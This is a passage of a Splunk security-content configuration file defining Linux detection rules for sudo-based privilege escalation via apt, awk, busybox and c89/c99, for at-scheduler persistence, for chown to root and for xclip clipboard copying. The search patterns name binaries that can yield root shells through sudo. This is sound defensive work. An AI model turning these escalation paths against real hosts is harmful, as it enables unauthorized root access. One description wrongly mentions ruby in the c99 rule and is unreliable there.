Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*apt*" AND Processes.process="*APT::Update::Pre-Invoke::*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_apt_privilege_escalation_filter` [ESCU - Linux At Allow Config File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of suspicious configuration files, /etc/at.allow or /etc/at.deny, in Linux. These files are commonly abused by malware, adversaries, or red teamers to establish persistence on compromised hosts. The configuration files determine which users are allowed to execute the "at" application, which is used for scheduling tasks in Linux. Attackers can add their user or a compromised username to these files to execute malicious code using "at." It's important to consider potential false positives as administrators or network operators may create these files for legitimate automation purposes. Adjust the filter macros to minimize false positives.\ Identifying the creation of these configuration files is valuable for a SOC as it indicates potential unauthorized activities or an attacker attempting to establish persistence. If a true positive is found, further investigation is necessary to examine the contents of the created configuration file and determine the source of creation. The impact of a true positive can vary but could result in unauthorized execution of malicious code, data theft, or other detrimental consequences. Analysts should review the file path, creation time, and associated processes to assess the extent of the attack and initiate appropriate response actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation of suspicious configuration files, /etc/at.allow or /etc/at.deny, in Linux. These files are commonly abused by malware, adversaries, or red teamers to establish persistence on compromised hosts. The configuration files determine which users are allowed to execute the "at" application, which is used for scheduling tasks in Linux. Attackers can add their user or a compromised username to these files to execute malicious code using "at." It's important to consider potential false positives as administrators or network operators may create these files for legitimate automation purposes. Adjust the filter macros to minimize false positives.\ Identifying the creation of these configuration files is valuable for a SOC as it indicates potential unauthorized activities or an attacker attempting to establish persistence. If a true positive is found, further investigation is necessary to examine the contents of the created configuration file and determine the source of creation. The impact of a true positive can vary but could result in unauthorized execution of malicious code, data theft, or other detrimental consequences. Analysts should review the file path, creation time, and associated processes to assess the extent of the attack and initiate appropriate response actions. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints into the Endpoint datamodel. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can create this file for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-17 action.escu.modification_date = 2021-12-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux At Allow Config File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux At Allow Config File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/at.allow", "*/etc/at.deny") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_at_allow_config_file_creation_filter` [ESCU - Linux At Application Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the execution of the "At" application in Linux, which can be used by attackers to create persistence entries on a compromised host. The "At" application can be used for automation purposes by administrators or network operators, so the filter macros should be updated to remove false positives. If a true positive is found, it suggests an attacker is trying to maintain access to the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the required fields from your endpoints into the Endpoint datamodel. When a true positive is detected, it suggests that an attacker is attempting to establish persistence or deliver additional malicious payloads by leveraging the "At" application. This behavior can lead to data theft, ransomware attacks, or other damaging outcomes.\ During triage, the SOC analyst should review the context surrounding the execution of the "At" application. This includes identifying the user, the parent process responsible for invoking the application, and the specific command-line arguments used. It is important to consider whether the execution is expected behavior by an administrator or network operator for legitimate automation purposes.\ The presence of "At" application execution may indicate an attacker's attempt to maintain unauthorized access to the environment. Immediate investigation and response are necessary to mitigate further risks, identify the attacker's intentions, and prevent potential harm to the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the execution of the "At" application in Linux, which can be used by attackers to create persistence entries on a compromised host. The "At" application can be used for automation purposes by administrators or network operators, so the filter macros should be updated to remove false positives. If a true positive is found, it suggests an attacker is trying to maintain access to the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the required fields from your endpoints into the Endpoint datamodel. When a true positive is detected, it suggests that an attacker is attempting to establish persistence or deliver additional malicious payloads by leveraging the "At" application. This behavior can lead to data theft, ransomware attacks, or other damaging outcomes.\ During triage, the SOC analyst should review the context surrounding the execution of the "At" application. This includes identifying the user, the parent process responsible for invoking the application, and the specific command-line arguments used. It is important to consider whether the execution is expected behavior by an administrator or network operator for legitimate automation purposes.\ The presence of "At" application execution may indicate an attacker's attempt to maintain unauthorized access to the environment. Immediate investigation and response are necessary to mitigate further risks, identify the attacker's intentions, and prevent potential harm to the organization. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux At Application Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = At application was executed in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux At Application Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Endpoint.Processes where Processes.process_name IN ("at", "atd") OR Processes.parent_process_name IN ("at", "atd") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_at_application_execution_filter` [ESCU - Linux AWK Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Awk is mostly used for processing and scanning patterns. It checks one or more files to determine whether any lines fit the specified patterns, and if so, it does the appropriate action. If sudo right is given to AWK binary for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Awk is mostly used for processing and scanning patterns. It checks one or more files to determine whether any lines fit the specified patterns, and if so, it does the appropriate action. If sudo right is given to AWK binary for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-07-31 action.escu.modification_date = 2022-07-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux AWK Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux AWK Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*sudo*" AND Processes.process="*awk*" AND Processes.process="*BEGIN*system*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_awk_privilege_escalation_filter` [ESCU - Linux Busybox Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = BusyBox combines tiny versions of many common UNIX utilities into a single small executable. It provides minimalist replacements for most of the utilities you usually find in GNU coreutils, util-linux, etc. If sudo right is given to BusyBox application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = BusyBox combines tiny versions of many common UNIX utilities into a single small executable. It provides minimalist replacements for most of the utilities you usually find in GNU coreutils, util-linux, etc. If sudo right is given to BusyBox application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Busybox Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Busybox Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*busybox*" AND Processes.process="*sh*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_busybox_privilege_escalation_filter` [ESCU - Linux c89 Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The c89 and cc commands compile, assemble, and link-edit C programs; the cxx or c++ command does the same for C++ programs. The c89 command should be used when compiling C programs that are written according to Standard C. If sudo right is given to c89 application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The c89 and cc commands compile, assemble, and link-edit C programs; the cxx or c++ command does the same for C++ programs. The c89 command should be used when compiling C programs that are written according to Standard C. If sudo right is given to c89 application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux c89 Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux c89 Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*c89*" AND Processes.process="*-wrapper*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_c89_privilege_escalation_filter` [ESCU - Linux c99 Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The c99 utility is an interface to the standard C compilation system; it shall accept source code conforming to the ISO C standard. The system conceptually consists of a compiler and link editor. If sudo right is given to ruby application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The c99 utility is an interface to the standard C compilation system; it shall accept source code conforming to the ISO C standard. The system conceptually consists of a compiler and link editor. If sudo right is given to ruby application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux c99 Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux c99 Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*c99*" AND Processes.process="*-wrapper*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_c99_privilege_escalation_filter` [ESCU - Linux Change File Owner To Root - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for a commandline that change the file owner to root using chown utility tool. This technique is commonly abuse by adversaries, malware author and red teamers to escalate privilege to the targeted or compromised host by changing the owner of their malicious file to root. This event is not so common in corporate network except from the administrator doing normal task that needs high privilege. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222.002", "T1222"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for a commandline that change the file owner to root using chown utility tool. This technique is commonly abuse by adversaries, malware author and red teamers to escalate privilege to the targeted or compromised host by changing the owner of their malicious file to root. This event is not so common in corporate network except from the administrator doing normal task that needs high privilege. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Change File Owner To Root - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may change ownership to root on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Change File Owner To Root - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222.002", "T1222"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = chown OR Processes.process = "*chown *") AND Processes.process = "* root *" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_change_file_owner_to_root_filter` [ESCU - Linux Clipboard Data Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of Linux Xclip copying data out of the clipboard. Adversaries have utilized this technique to capture passwords, IP addresses, or store payloads. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of Linux Xclip copying data out of the clipboard. Adversaries have utilized this technique to capture passwords, IP addresses, or store payloads. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present on Linux desktop as it may commonly be used by administrators or end users. Filter as needed. action.escu.creation_date = 2022-07-28 action.escu.modification_date = 2022-07-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Clipboard Data Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ adding or removing content from the clipboard. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 16}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 16}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 16}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Clipboard Data Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=xclip Processes.process IN ("*-o *", "*-sel *", "*-selection *", "*clip *","*clipboard*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_clipboard_data_copy_filter` [ESCU - Linux Common Process For Elevation Control - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for possible elevation control access using a common known process in linux platform to change the attribute and file ownership. This technique is commonly abused by adversaries, malware author and red teamers to gain persistence or privilege escalation on the target or compromised host. This common process is used to modify file attribute, file ownership or SUID. This tools can be used in legitimate purposes so filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for possible elevation control access using a common known process in linux platform to change the attribute and file ownership. This technique is commonly abused by adversaries, malware author and red teamers to gain persistence or privilege escalation on the target or compromised host. This common process is used to modify file attribute, file ownership or SUID. This tools can be used in legitimate purposes so filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-23 action.escu.modification_date = 2021-12-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Common Process For Elevation Control - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Common Process For Elevation Control - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], 